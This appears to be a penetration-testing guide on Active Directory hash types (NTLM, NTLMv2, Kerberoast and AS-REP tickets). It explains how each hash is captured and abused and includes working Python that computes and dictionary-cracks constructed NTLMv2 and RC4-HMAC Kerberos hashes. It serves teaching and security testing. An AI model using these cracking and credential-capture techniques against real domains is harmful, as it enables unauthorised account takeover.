This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com

Authentication Attacks

Hash Types in Active Directory Environments

Hash Type Reference Table

Each entry lists the hash type, its hashcat mode, the line format hashcat expects, where the hash comes from, and what it is used for.

NTLM
  Hashcat mode: 1000
  Format example: 31d6cfe0d16ae931b73c59d7e0c089c0 (this particular value is the NT hash of an empty password)
  Source/extraction: secretsdump, SAM, NTDS.dit
  Primary use case: pass-the-hash, NTLM authentication (local or domain)

NTLMv2
  Hashcat mode: 5600
  Format example: user::domain:serverchallenge:ntproofstr:blob
  Source/extraction: network capture, Responder, ntlmrelayx
  Primary use case: challenge-response credential capture; crack offline or relay live (the response cannot be passed)

Kerberos TGS-REP (RC4-HMAC, etype 23)
  Hashcat mode: 13100 (AES tickets are 19600 for AES128 and 19700 for AES256)
  Format example: $krb5tgs$23$*user$REALM$spn*$checksum$edata2
  Source/extraction: Kerberoasting (GetUserSPNs.py, Rubeus kerberoast)
  Primary use case: service account password recovery

Kerberos AS-REP (RC4-HMAC, etype 23)
  Hashcat mode: 18200
  Format example: $krb5asrep$23$user@REALM:checksum$edata2
  Source/extraction: AS-REP roasting (GetNPUsers.py, Rubeus asreproast)
  Primary use case: user accounts with pre-authentication disabled

NTLM Hash (Mode 1000)

Purpose: The NT hash, the Windows password hash stored in the local SAM database and in NTDS.dit on domain controllers. It is still the primary stored form; the genuinely legacy one is the LM hash, which modern systems no longer store (the LM field then holds the fixed placeholder aad3b435b51404eeaad3b435b51404ee).

Structure: MD4 of the UTF-16LE encoding of the password, 16 bytes shown as 32 hexadecimal characters. There is no per-user salt, so every account with the same password has the same hash.

Weakness: MD4 is a fast, unsalted function, so wordlist and rule-based cracking runs at very high rates and one cracked hash unlocks every account that shares it. The value 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password.

Attack Value: The hash is a password-equivalent credential: pass-the-hash authenticates over NTLM without ever knowing the plaintext, and because the NT hash is also the RC4-HMAC Kerberos key it can be used to request tickets (overpass-the-hash).

NTLMv2 Hash (Mode 5600)

Purpose: Not a stored hash but the client's answer in NTLM challenge-response authentication over the network (SMB, HTTP, LDAP and others). Mode 5600 is NTLMv2 only; NTLMv1 responses are mode 5500.

Structure: NTLMv2 hash = HMAC-MD5 keyed with the NT hash over the upper-cased username followed by the domain (UTF-16LE). NTProofStr = HMAC-MD5 keyed with that NTLMv2 hash over the 8-byte server challenge and the client blob (response header 01 01 00 00, timestamp, 8-byte client nonce, target information). The hashcat line is user::domain:serverchallenge:ntproofstr:blob.

Weakness: The response can be captured by anyone who can make the client authenticate to them: LLMNR/NBT-NS/mDNS poisoning (Responder), coerced authentication, or a man-in-the-middle position on the wire.

Attack Value: Cracking yields the cleartext password, which then works for Kerberos, RDP and everything else. The captured response itself cannot be passed or replayed, since it is bound to the server challenge and timestamp; to use it without cracking, relay it live (ntlmrelayx) to a target that does not enforce signing.

Kerberos TGS Hash (Mode 13100)

Purpose: A service ticket (TGS-REP) for a service principal name, whose encrypted part is sealed with the long-term key of the service account that owns the SPN. Any authenticated domain user can request one for any SPN; the KDC does not check whether the requester may actually use the service.

Structure: Kerberos ticket encrypted with RC4-HMAC (etype 23, key = the account's NT hash) or AES (etype 17/18, key derived from the password with PBKDF2 and a salt built from the realm and username). Mode 13100 covers etype 23 only; AES tickets are modes 19600 (AES128) and 19700 (AES256) and crack far more slowly, so request RC4 tickets where the account still allows them.

Weakness: Human-set service account passwords are often weak and rarely rotated, and the ticket is an offline oracle for guessing them. Machine accounts and group managed service accounts have long random passwords, so their tickets are not worth cracking.

Attack Value: Service accounts typically hold elevated privileges over applications and databases, and the recovered password is the account's real password, usable for interactive or network logon.

AS-REP Hash (Mode 18200)

Purpose: The Authentication Server's reply (AS-REP) for an account that has Kerberos pre-authentication disabled. Normally the KDC demands a timestamp encrypted with the user's key before it answers; with pre-authentication off it answers anyone who supplies the username, no password required.

Structure: The enc-part of the AS-REP (session key and ticket metadata) encrypted with the user's long-term key. Mode 18200 is the RC4-HMAC case (etype 23), where that key is the NT hash; the hashcat line is $krb5asrep$23$user@REALM:checksum$edata2.

Weakness: Accounts with "Do not require Kerberos pre-authentication" set (UF_DONT_REQUIRE_PREAUTH, 0x400000 in userAccountControl). They can be enumerated over LDAP with any domain account, or found blind from a username list with no credentials at all.

Attack Value: Cracking gives the user's cleartext password, a direct account compromise from an unauthenticated position. The flag usually lingers for compatibility with old clients, so the affected accounts tend to be old and overlooked.
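The NTLM, NTLMv2, Kerberos TGS and AS-REP sections above all bottom out in the same key: the unsalted MD4 NT hash. The following is an added example, not code from the original page, that works the arithmetic through end to end: it computes the NT hash, builds and cracks a mode 5600 line, and seals and cracks an RC4-HMAC ticket the way modes 13100 and 18200 verify a candidate (the two differ only in the Kerberos key usage number). MD4 is implemented inline because OpenSSL 3 builds of Python often ship without it. Usernames ("jdoe", "svc_sql"), the "CORP" domain, challenges, the ticket body and the wordlist are all constructed for the demo; the ticket body is a placeholder string, not a real EncTicketPart.

```python
import hashlib, hmac, struct

# Added example, not code from the original page: the arithmetic behind the NT-hash
# based formats above (modes 1000, 5600, 13100 and 18200) plus a small dictionary
# attack against each. MD4 is implemented inline because OpenSSL 3 builds of Python
# often lack it. Usernames, challenges, ticket body and wordlist are constructed.

MASK = 0xFFFFFFFF
R3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)  # round-3 word order

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def md4(msg: bytes) -> bytes:
    """MD4 per RFC 1320: pad, then 48 steps (three rounds) per 64-byte block."""
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", len(msg) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        A, B, C, D = a, b, c, d
        for i in range(48):
            j = i % 16
            if i < 16:    # round 1: F, message words in order
                f, k, s, t = (B & C) | (~B & D), j, (3, 7, 11, 19)[j % 4], 0
            elif i < 32:  # round 2: G, words taken by column
                f, k, s, t = (B & C) | (B & D) | (C & D), (j % 4) * 4 + j // 4, (3, 5, 9, 13)[j % 4], 0x5A827999
            else:         # round 3: H, bit-reversed word order
                f, k, s, t = B ^ C ^ D, R3[j], (3, 9, 11, 15)[j % 4], 0x6ED9EBA1
            A, B, C, D = D, _rotl((A + f + x[k] + t) & MASK, s), B, C
        a, b, c, d = (a + A) & MASK, (b + B) & MASK, (c + C) & MASK, (d + D) & MASK
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    """Unsalted MD4 of the UTF-16LE password: one password, one hash, no per-user salt."""
    return md4(password.encode("utf-16le"))

def ntproofstr(user, domain, nthash, server_challenge, blob):
    """NTLMv2 hash = HMAC-MD5(NT hash, UPPER(user)+domain); proof = HMAC-MD5(that, challenge+blob)."""
    v2_hash = hmac.new(nthash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(v2_hash, server_challenge + blob, hashlib.md5).digest()

def crack_5600(line, wordlist):
    """Mode 5600 line: user::domain:serverchallenge:ntproofstr:blob. Returns the password or None."""
    user, _, domain, chal, proof, blob = line.split(":")
    chal, proof, blob = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for pw in wordlist:
        if hmac.compare_digest(ntproofstr(user, domain, nt_hash(pw), chal, blob), proof):
            return pw
    return None

def rc4(key, data):
    S, j = list(range(256)), 0
    for i in range(256):                      # key schedule
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def rc4_hmac_encrypt(key, usage, plaintext, confounder):
    """RFC 4757 etype 23 as the KDC seals a ticket; returns (checksum, edata2)."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    checksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, confounder + plaintext)

def rc4_hmac_check(key, usage, checksum, edata2):
    """Per-candidate test a cracker runs: derive K3, decrypt, recompute the checksum."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return hmac.compare_digest(hmac.new(k1, rc4(k3, edata2), hashlib.md5).digest(), checksum)

KEY_USAGE = {13100: 2, 18200: 8}  # TGS-REP ticket enc-part = 2, AS-REP enc-part = 8

def crack_krb5_rc4(mode, checksum_hex, edata_hex, wordlist):
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    for pw in wordlist:
        if rc4_hmac_check(nt_hash(pw), KEY_USAGE[mode], checksum, edata):
            return pw
    return None

def demo():
    wordlist = ["Welcome1", "Summer2023!", "P@ssw0rd", "password"]   # constructed
    # NTLMv2 capture (constructed): server challenge, blob = header 01010000, reserved,
    # timestamp, client nonce, reserved + empty AV-pair list
    chal = bytes.fromhex("1122334455667788")
    blob = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 8
    proof = ntproofstr("jdoe", "CORP", nt_hash("Summer2023!"), chal, blob)
    line = f"jdoe::CORP:{chal.hex()}:{proof.hex()}:{blob.hex()}"
    # Kerberoast (constructed): placeholder ticket body sealed under svc_sql's RC4 key, usage 2
    checksum, edata = rc4_hmac_encrypt(nt_hash("P@ssw0rd"), 2, b"EncTicketPart placeholder", b"\x11" * 8)
    return {"ntlmv2_line": line,
            "ntlmv2_cracked": crack_5600(line, wordlist),
            "tgs_cracked": crack_krb5_rc4(13100, checksum.hex(), edata.hex(), wordlist)}
```

The point to take from the code is how little work each candidate costs: one MD4, then two HMAC-MD5 (NTLMv2) or two HMAC-MD5 plus an RC4 pass (Kerberos). That is why these modes run at GPU speeds that make long wordlists and rules practical, while the AES modes, which replace the MD4 with PBKDF2, do not.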
